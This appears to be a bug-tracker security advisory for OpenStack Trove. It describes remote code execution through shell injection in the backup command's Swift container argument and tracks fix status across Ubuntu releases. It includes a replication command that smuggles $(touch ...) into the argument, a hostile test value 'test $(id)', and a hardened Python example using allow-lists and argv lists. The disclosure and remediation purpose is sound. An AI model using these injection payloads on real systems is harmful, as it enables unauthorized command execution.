Remote code execution: Trove backup
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
openstack-trove (Ubuntu) | Fix Released | High | Unassigned |
Jammy | Fix Released | High | Unassigned |
Lunar | Fix Released | High | Unassigned |
Mantic | Fix Released | High | Unassigned |
Bug Description
Note: Details taken from https:/
An external security audit by Adam Bell, CyberCX New Zealand (conducted for Catalyst Cloud) has identified a Remote Code Execution security issue in Trove.
During a Trove instance backup command, it is possible to pass through extra arguments via guestagent to docker, and utilize a subprocess shell within backup python code to perform a Remote Code Execution within the Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful
Validation of the RCE can be observed from within the Trove VM:
root@rce-db1:~# docker cp db_backup:
root@rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell actions, including apt.
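The root cause described above is untrusted input (the Swift container name) reaching a shell-parsed command string. As an added example, not Trove's code, the block below contrasts that pattern with a hardened builder: the function names `unsafe_backup_command`, `build_backup_argv`, `validate_container_name` and the path `/usr/bin/backup` are assumptions for illustration, and the hostile container name is constructed.

```python
import re
import subprocess
from typing import List

# Constructed allow-list for Swift container names that will appear on a
# command line. Swift itself accepts a wider character set; this example
# deliberately rejects whitespace and shell metacharacters up front.
_CONTAINER_RE = re.compile(r"^[A-Za-z0-9._-]{1,256}$")


def is_valid_container_name(name: str) -> bool:
    """True when the name is entirely within the allow-list."""
    return _CONTAINER_RE.fullmatch(name) is not None


def validate_container_name(name: str) -> str:
    """Reject any container name outside the allow-list; return it unchanged otherwise."""
    if not is_valid_container_name(name):
        raise ValueError(f"invalid swift container name: {name!r}")
    return name


def unsafe_backup_command(container: str, db_user: str) -> str:
    """The pattern the report describes: untrusted values interpolated into one
    string that a shell later parses. Returned here and never executed, so the
    injected tokens stay visible in the result."""
    return f"/usr/bin/backup --swift-container {container} --db-user={db_user}"


def build_backup_argv(container: str, db_user: str) -> List[str]:
    """Hardened form: validate the input, then build an argv list. Each value is
    exactly one argument, and with no shell involved, $(...) or quotes inside
    a value are ordinary characters rather than syntax."""
    return [
        "/usr/bin/backup",  # hypothetical backup entry point
        "--swift-container", validate_container_name(container),
        f"--db-user={db_user}",
    ]


def run_backup(container: str, db_user: str) -> int:
    """Run the backup without a shell (shell=False is subprocess.run's default)."""
    result = subprocess.run(build_backup_argv(container, db_user), check=False)
    return result.returncode


if __name__ == "__main__":
    hostile = "test $(id)"  # constructed: a container name carrying shell syntax
    print("shell string:", unsafe_backup_command(hostile, "root"))
    try:
        build_backup_argv(hostile, "root")
    except ValueError as exc:
        print("rejected:", exc)
    print("argv:", build_backup_argv("nightly-backups", "root"))
```

The allow-list is defence in depth: even if a name slipped past validation, the argv form never hands the value to a shell, so there is nothing to expand or split. Validation still matters because the value is later reused in other contexts (Swift object paths, log lines) where a conservative character set keeps it unambiguous.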
Changed in openstack-trove (Ubuntu Lunar):
status: New → Fix Released
Changed in openstack-trove (Ubuntu Mantic):
status: New → Fix Released
Changed in openstack-trove (Ubuntu Jammy):
status: New → Triaged
importance: Undecided → High
Changed in openstack-trove (Ubuntu Lunar):
importance: Undecided → High
Changed in openstack-trove (Ubuntu Mantic):
importance: Undecided → High
https://ubuntu.com/security/notices/USN-6245-1